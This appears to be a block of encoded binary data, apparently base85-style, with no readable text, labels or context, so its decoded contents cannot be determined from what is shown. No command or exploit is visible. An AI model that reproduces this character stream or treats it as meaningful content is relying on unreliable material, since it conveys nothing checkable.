zv-7N4cqU^ed=DJ1zEF=`E1N|Afo9PBbTaDJb!{!CXaywBGfqk>IzxT~@o4IV!Sy6hv2JcqoIZk^2iu35d_q4|{ z4hg;gAm9E`-1wiDN2LsbP6_kLI4G15F9Ct`>-8Q4RcNxeKP3j{4;pi|VG|ME?M0R; zfLjmR5WSOv5B($JEpon&{vyt%Be8$uX^uw(?2m=yl`xR`*R>L$c91xibn`>tx8Jla zoQ1R?5;hOD?+bKaw}J=#Dqq{-hzX&I{;Xw_1aG_YFJF#7*zs2qb@{sT6{?0La6s)^ zURZrQw~D?I%ANE z_deKgj1j=*=DTPwGX#Qs_dNGFn+~vX2-G7zP*F`uqX5La&(8gQN%bB0+rg*5AzASr z@p3KxP)Cga62J)m5x@Y&Qq@*!XoS70prh8Xk;j&+ot5{(3+@DXGjm`65H8NQhj(}m zISq>bYG5o$yU?JywyB5;_}BR62sEbi%zzCUc=EOjS2Hp$91Kl;I`tuvrlCLRtzbmRAk9{VImj3nucVy|%^Q^IQhmMKME z$2+SNDmy8(v-BMS)edRsM$~QnMG{9Zy*4`8SiuKewN`U{;#T@`H?kYRO*XVQ-tv8O za6DwP^49v@lV&m!Q>;v&OG1+eJ(O{5tfvUiT70h&Ak&C~6M>jbUHEhqiXbH=N zkiTbDqjp{_OqO|uKwu&q(4rz5S~(y0{?&)ZRsCJqD7N8laA-;Wtx62B*Z6(Q0`bnT zJ*=B5*l<=TqxrBv{&}hSTr__!;pQ%rd7P0~>kw`qg|XeB(eF@Y?@IQnKvUuryD-$n7MH9F(G@ohH78;>mkUaE^){ z=vXc82rAV>=g1WEn2}o;bdB2ouinl&uBra-|HMT|8XzSh-8Dg^1_*+Jq#`9L;OG#L zMoOh7h%`)8QhKy>N=rBxjiVV%ax}j){CZtpzu)8j-S=Pj{$o3w$9Cd#p6__Q-dAJD z1km|GPPI`Jc9b=3gb{h10g|$v=QWcrp${X+_F^uo4ctC4lrFj`ZmcawB5sy_la(B3 zcJB+cHWw-Mjqz>OI$GLm^z)aB*M0-T3Aa8=Y@4l+o0b8k5*gI~Vse7?P&pb!V4EEc z@uG#)^y?JP?cqu(8QZzFnnX(%`k?@oK9>$unRGP~-VFKx4+NIIAM!Ry;0Z0RQdqqb zlhEW75`Tn8Q4nA~kwkbq4jJ*{MAc0z>97GG@4Wlw@6!^u>{Z)pi z&!~SSTZ}Q&BWgZu3ccTry3;6-1Udv95}0IH2N;=eeY?ax5K(QTPzcyJjX%az90!d; z0&m&@@dtlZa)M8sbU8`-lGOIy2Lsz`>K?32GdIJF(*fs&lcIFUQBt{yG?jP=zT&7Z zJuWLj0H_pyyDc3?IswwvYjM2e@T>al2Caln{VzgvDZwToB%Wg*XJxmA$3K+ambvWh z_4Q?LMpkd)3MK}#vjKadJUK|!+F7lU!U`;BJ0MNd>2DLItQ||qh$xLzM6M@H#i(+u z^cMYh33JVtx*qA8&oeTQlj=k^aCz_^`HvQ8OXIhnvXj z*tfr0_14`J3}Ku_{_NX?Z>NkMwQ!bR!y9ogyQq_sEoz|e1Z z$vRM*Zd^kCQBu&XY~Re{;oW|Z1Pzmhc z7B#OG4;Qf7IW~xG!1EFI4{V+`-9$T8BJi%I$q;DKpYq+Pq*`yNZHwP6ZECQ1EaL?z z_@D0kQ(lYr3neL|jS_iVqgE?>@Vqa7*@uicqcVv+pg0=4m6@K)8%oxgLNFGSt zLdCgc=!OXHUXLXdi}T44or;&e;k0^uL%2^OPbutOAE@v`^xe;1Fea);m}_Rf`zbrpFv9y?$hYbNR&B@Mb6AH;pi0=VFkU&gXdA9J{I;dP)X zjMSKU`kmLa)O%a9ACHLfe18Urh9ET7R*rS=(=VM>c?GINKxeE?GmR6XDsGo%rSyFl zOUHHZ%w1)%HosV$`SmMXJ<*^d|K1p=B8DSvmsp#7vIFb&=C3X2lPi)m3nwYwHW@=n zQzvL{>(P_9rk&gyo0EPWA5%Ij8#X#Ka!?XtJ z1Zc!Gj}#bhNL8u_xh9uvAC>qnB8zKH&PM2i)xjr~+@oGKPN7=|VpLKtes;y=>PE<@ zlNL3MPyJgnyD5%jci5XXJ8%wzTp*%6UhX)TkVoYx?$(;aZA0&?-B3Ji-a9=T)s&v0 zzGn`jd}Dm`n-9wC9*xL$-=eLssFsa1;kev7VnLLOT-|3&cvAEN9xZ+Eb|||*e~TYV z@Qyyy6(=T?VLo2}(jU?{4Vi+-9pz#0S8K~Soz+ZyndbgMHO-YV#u2p{OqrJ`|F zQCRHPQNJhRKaNd>+>t;f>8XVv(6t5p1jnRK!wGb*-Tq^~_ahIunLDO$?P<-pXk(T` zNQ~%s+6gqxJ$Dd4&Ax=3Id~y3?#bFxcqH}i#d02;UdE{xZuj7^pS`Ls z6xQ$5KTT(SPgJPsC>LfFV#~AaexDUp9_7_EOWwU6W6Ptpd~zkpb`Y!O5)eu%m!s&N zkOU~6_rH;VQCSg2$7wfsah;~A|Wk_SxqRRD6xlN2${gjfSP5{+}C4e!Tu8)TB!{U zjEVhY6EI%tj1W99>PS|;G4!izn~zqp)v$h%in=;m_~l`;0x!reZMF$xz)j&GlS?yK zGUG@S^)Yn9v7N{f!>jBV*emZnpR>OfJ5x;Pc#z@&_8YR1Ro@L!f^qt7ww((^1JnxQ zSjSRgpbZwc@DchN0$vhio(+M`3lQ3)#SET$_jn^h2bNU0o9WLR+NC-r&nhc~89U;* z?i1=31yoOqwdr$BI^-FIV_XgJls-OFE{x(Q7g|>kdN2LdqAuH`OFVGf2Y-!yP)ZaM>nH> z2Hbpb>EegNh(&L^^oUPkPX}UBgG0$=D+4kcnMBoA3=UU~Y$jwnPdx~19}?Y6ux>$Z zG4ym?>EDX6-C=+$hb2;`g0AtvsuNJe3x=Tz0f&7QMOP^OSg#7I7c^EU9MvSAXcoDi zJ{DSo_l_ABNmT`2e4V+?h&PrZly3L~&GR5FeUx0#9a?)lS?ov(mchp+=S3U#;BJ#^ zmK@md9)tq42YdZq4wlrI6?X{~#9ISSt)=r;%wYIKG#KxYjz^uu_ePsQ5G4wF7{^6R z(&;_BqXZj7jgR&wh3U=;RzvR8gP(^*P;MLh#Y_3>AWAY#XSWuKWDp|V9f_8k6cJ0E zr(ve;igHhQ&Z7x^3P{cBV}1V%zRl5MU*8cZ^~RH_!xj<@Mt_2gO9UTzJnIdf2J390 z4^A)jYF(VGh0-+P-%( z=q3NXm~zG{dsH(L3QW79TrFtFL&*ORkCtki7^wZ#X8AKKoCpyPeKeEnUa<|*n z$r~LGtP_{T-@2sb49X0rQa?o7f(`>IXMHt2Ot8VQ#hKKzhqW$+l{8-mx}7K=t;d|2 zoq#eT7}6$5;>F}?L`#O454*JDg?xwi{hQcNqxU2zNSaV9AVeR13Wm;p zio7ncWx;#=NRROn_^-YOoz#(cP`BrJJY68TV~-WOpT?Pd2H2##uaRUSPGx zWJ&4*kGDBoN?vk*)3>iVGlP%8ILH-jEG%!&G z&4-^v8rq$Zn{U8B@E+3HcNP>v(z8$dh)loxE%%S;iY7AntkYf*@1IM8(gqnmL*1b0l@4yM0RcU3!3iV<*w9@g)!9@5b+N9CE{PS!!(X|n|)54^h z=#{G*NWdQQ1GQ~e!pBu+y(2!K4mV*5v5fW|iJTu54`G7p;*zJHLNY(4S7M)agm)L~ zkyt9V-Eyc!@~U6t0A_m^VeZn}86steBfjz!4mu+1O$KQUFf5}-BZeN zm7bPw+SL}%+NJyhEzlt;S?KtwaSo5J8X}L?p(b%sN64a(*@<9Pf;M+KCf zLCwJ3Z_E4fLGSF)e(%YIjuj+1MfF9agomglAs+Q2@lJME$4_=w&-CXu(*tfssYeR< zOX3n@><5E4gS`@LyR(PL;}X;;7Cv$5W6D<5Kbhz(`?4OS(MSmu?p*43+mpV($cW0y z`G8>+Bf!9#jt!&|wTxcXQ!iY+tF9RkMM!lGCXE7V3Z#~r(dYH=Xa?kYK%eyc+ZC=c z$o4HCz_YW^bE?czeB+6|hPF)I-Ei%IzpAwg)5K+lObDE_t-feBYhH)ud|0Ueu&C3Y zmrL2YU^vehOP@_8FxIQD(`_2H?Nh0v3VEgdq}?#dIj#MxomGpYm8|+MOKPX8OWbhB z6EFt1CYYN3JfAsdR&Ppz_e4B7i1pPX(9r{w2%;CJG0hVbsXJRUQ&V9@#hN)G>+6nr z2d_RlC@Yu!WLDWZjdtqcmGjS7p%cXIYWqeZ>$#94K{IE&_*|(@!|LAUJ>pMuE_nyE z+S7c580{>yJR99c`KlXdx_3uq4$^%Ff|0x0dd*^?& zJL&ZPQFx$%*D#xD84BXz(JtIoR(t>qww{`rQaP*vj!@UXELnX!#gjF1*JRQ)HE{3q z`7Dir>s7@^o1l*u%$966w@{s5KSQ>wL(YaS6}`@#>3ttgRzx-0a`rR0%{yBh*HotS z9E{#l0fitS{vH`KeYV&{9WN@m(dO zQS}Q`w_Fga^R=(EF?v1RY`G>4Vk5Oue5SMCxBE9_iL!{y7pd}}`h||)A!WC|!hc4w z@+w|#Kjl{(@veGXPGZ0-e%9Si{ia=-$`DyBE7%Vz@&pLzFGMsSG3G-f0zm{RQDO?+EVQw;r-U15v{cCCP5gv={>T zB3E64@2WamSA~Cm+!O5!92X%DF_d|WDiE)%HQskFjy^NtPr$eL`|F3p-|U};WB+2k z!pOIl#NbxX?656DjN-(%;2v7~+t$?Jao@xC|4_d}U^66npm_nu_x%pc@j?5f715%< z;XmlptVDydC248poNpiFslC@v*gEK=)8z;&JSR;I@8A+ak{ke1VO>yaf3|&K7vq*5 zUpqsT$t?%Bwspk%aTlz*MHiLLxA&Cz1~PE%H`CfLGQ(qC`!H+1obK&+RUaa6Uk4W1 zUGfu1m1eQk6+#MCF`F}HAXGux0G;??4oD=_Anm9R7&wy^omVxHfDiGg&U^Htxn_t<)Ef6GZbLxprcXQp>ndawy=(Ogz{9BE$z z^F?Cj8JA|hm&x};r7y&Z3wV>o(n}ZP2NfcRlDYZ=l-iNr^-T%PI*G8O3d%WKo>_TN zg_wN}z_Jmy9p{g{=aPBUGGtI0O*2 z+ClW};1KfoGCCA%`Y4NT5&gZ70~hZX*zYF`86+6pK|ctM(%NyWpY5Pm(8AZVQG9K} z5vzu5ZR<=UdQ|evY3U&5vZlHcaBl{G!V=S<9|+Lfe7^H?($`E$F5q)QAjkg<`6t+< zNFIgl@q_j#Ci7?WSF5m@3K=1!8|i!F{O>ERg+)e->l;qOIZ8P=ZJY)6v!yS=6q_3Ci^Cu2I z&HE0=%o!plmK3b%}mw>uysuWt+_gl64 z7SC*u%y;_23Ms;GVdXtvK*HweT9YC4R6(7?w(&wovABhb|H7k&$H07fnSuSWv*}`! z0LX4?hk2-0j_N$4p>j8iusjQ)ggzW7t5fYg7qW4I9G@+gT07SUmAAAZi#1hxB#wLu zlhBQ}y@CS3r%X}9-+UR_k_C*U(TfgtOM=EnY}5A+L2-rPw+!`bWR$wOAr}0Wtuit?$bIXT`2S&aY)YujzG%Q+g*~-bvU7}*|yqMp>!CpEXpb=%cS1j zO3xprND*uQWB!q6tbI1+$X6fL*VoXQ7d~+b^eZjI{SE$99TK%_kFX_{6q=1xWMj^^ z0y}O2<$?$a5yTjQ0+72MA;|Dy^rTUNo#X}Fx&8#sN=c%?zP61~Pm&$Ddr10d_b<%| z1~e0^icBA(o`Ozce*s3Y@>hrUu;^bGT_d}^G%cB~K$w7_NFQ;ER)<)T@1t>v^_S&< z%Aytj&16ZS*l^&m-Laz1jtBw~-H4y5spmoh=}PKRs^5!9zTV&5Ye;sTn23F;Qx?tP zW^;1TuFdElSa6Q^Efa~SDj+U-P{QZ40u0h>YC<(<;FZQAj|3et*X11)U-YB#TO>+HT@Zz*&)X#C|O&DZ<3+yR%IRu+coi zL-{Eu@Z(n{Omj{F(@@|%GG4DDLi;_oovo52U~|6dd^h??P? zJK9e;VV0Ev9@#tBah5AYGT(`{`NnJ=rHBau<^;yQaV?#yC1}2FxL& zx)JZEIr1}QkOw?4R_e=n(jRHnSAS3kB>j`rc8kVsZC;THCmH}j01=yiC_Jqmeb;KH zO*9zAQEcMsy=%b8fBAN7<#j|r6n&mIO*X}dTA=E!M6GZQ^{cVv^YfinGk2;dj-?76 zIsz;{y>R_I*{_VwFCLD{0NWb@cmK$Xw;%kwOomD^@1tbN7gU3eM!Nan9DNHzHqw=A zG-#Tw=lnkClUo#twz2lgmPyhD<{)Ec*0Q)>377x10AT&R8R5gN6vVk8f>k|d_+a#0 z$sGZ$nU`IakHGN~IWXc36OU$a#QhQ3QrjC(!i~ENRhxeenKt4T_#$Dle!2!|wl7`k zs(6y~50?MSlgjd6>GwWIt?H_(s&ju;w*#;n;IDdul8FFTzgMpo`#!V&;YkJ51LPh4 z?@b(yz@a_=h#&sF^MB>`|L~-WKu%KGu+?mAY_Ok9?(J31r{TUc?xlk(XILd`aF6V! zYw~0R?+fJwfI@&V)Y2x#QNCDQ&L4b=I?wWF**b3Asj`mGkVh5NzI+#$p3L{dfn4Xe zed%42IUt8=N1Z@DQnwaaf5J#hvJ0$&NB+3~F$&p)f$!O>UInN|CaTMX5bT*wXJ`pf zf94x~I{X9IY>>K<;^yYP9?x_jRlZ43oZ*G7fvHju4oB3O=vealuo^mYEX!whbBSwT zes({!lCeTl1*T_QtC#VR4-)ouVCe2S-_H_(;otX%*ZxlVgDaq~#W;Z&&4>}#xd{{_ zm=;|Tk|a|%j*Dot?f6ktsO8Fnv%PA$1NS@wV!`y$E`Pg2e;imb9M3CU!z-mZ`NnA?sI$-Eo4TiH2(cq6Tc&|@7TFLJzvzglxcoVuyWsHrHGcRakr9we zYg+VDU(!FP`OO2aQ_DKS7h<8||H<^@lW~L>7n&_IvF@fmoUI1cy9*Txw{4-~Ogpm+ zO)P=6K+BwhE8;=XD=~^XXhG$rU3t@m)sq&kEvfC)&CAd4w^gpHuKnON?r?TYD8F&+ zWP(@2-oV3dt;AMH-;L8&1L|rXpzN>N+>aHhmMyfLndHgxiqW+X>O&cQMY8i>j$t+U zP2wiHmz8~+hZWlIG>eOV!Xf+sfbhCOBXi|QCH>2*N}^!Rj}wwC-(~x+KHvLjK+&Gu zLuoD4xEE=WR9=VSSi40T$Xa~71H;5lKHYDyCn$bBrq6L97O`AeG%)>{U%~xQ=ohUU zdt&3JL|D`b`jTJ2)v8Nq9N$=wARH_WMYz`#o#)h#i$__^VzDQefe^|TZD$BuXznkU z{lTG6cNMj;546rlww3(D?B&xOVEo+$@8~Qvs9jX)2zQb`1UdsAndaz3cnl25zsHJq z5?OJ^)}D(cDb_Bv*rSh^aLA>ruJdk=Ip8t?6b(BpO^F8ZGt(MNDaIePP2roW{;XoZ zbMSJULwRuz>8@{CVWa>!A86327Ld zNv?kFK?#Nv^^}?0FPYA!hypoP5B@X+xl@#x&8MKJpdsaR@-{yvu%TV>>{~i17Fh^5 zXK0YZuC@xK$0WS)OatZVDEsO|Rpi5-Mv23w=>WLp1aWgf^erh)m|8$^RH7Nlx^1?H z>sFl;T8|`Yv(yRyx;|b1F(Jt=RY2Q~W^Bbn1xJ${A3wXkU6);2ZO=h^VWVHiXBp?Q zy1#zQjnZVD|1fa`U5_DN%|hS-JiL|a2|VSlC^qD&j4rW z?T*c0KBEklfD+A^wj8)jcmGzBL_01V>8~$j5Ve$K~p;#6x1`4aOP#l;T zZ=42hKaUI0Haf``)8-Owq8kfPp1uHTys3eGzQKH5f@=naj8Y`jt2Df8ZvYteyky+D zq)1txgCAG(!8)it?VV%)r*dk`4s}lOWj^11*QX~V;Ho8qg=&T9Yzj8RZRNU7-B}l>?Jq=KuK#qA))GwLo2vsOa^i zKF3I&g3$?+KQ;eafWEZ<;`=4@du`=-T^Pzyg-@M)pF1+;;Fb4hvYKp=OT37zb*m0G z8Z>BBHt}x62+>Y*{DK9sMDg$^t17bgaVq~X-Y-Ea_UAU(G<`ssKi|t`J!g3(XI=5W zhO}Xdb>7>rY{7{3*QL(d$LT3v?4sd+6YY~5k_J`jN(@|6Y95!w!1eC_TKUD-NjzFA z#gdq2RMi9s8Ud}ZHBb%OM{e&olP+vUW;z>P-vITeYE3NP1dR>YxVWuJv)>r;&t6hB zQ?jwQT0F89u&3aDWpbsk@QyvW`A^afb^M~WkZzju3uNhi&ye7I{(T&`suehL@9z(7 zA3yimfIrG8)!3}HPa7(n^Ww6)MWav^r~TrkZO_W!hW-3J&tF!=DEJJ>PA<02izUq# zT3d3D*;9L(akh-Ufnv~dKNyw+6q6emKo8ni$%71#{#Lxjzpn7cD!?uWi1(Qkvdm!> z7EGd|2?YdAA=cEqc!<8iDW;OnD#e{6j;pQjrWpIR?{w8rzq2-P^{~wFZp`E9RVgNq zJ+78S63K+g zW<;B}}ZX{quYOry_0_1(~ikwYNJzhRseI`9NJ)MvOl>$bEagxvI u&?GcGxzQ5Di9@$oi~pxl<(wk_ItI5H^E#!X`Ks}N*IgA&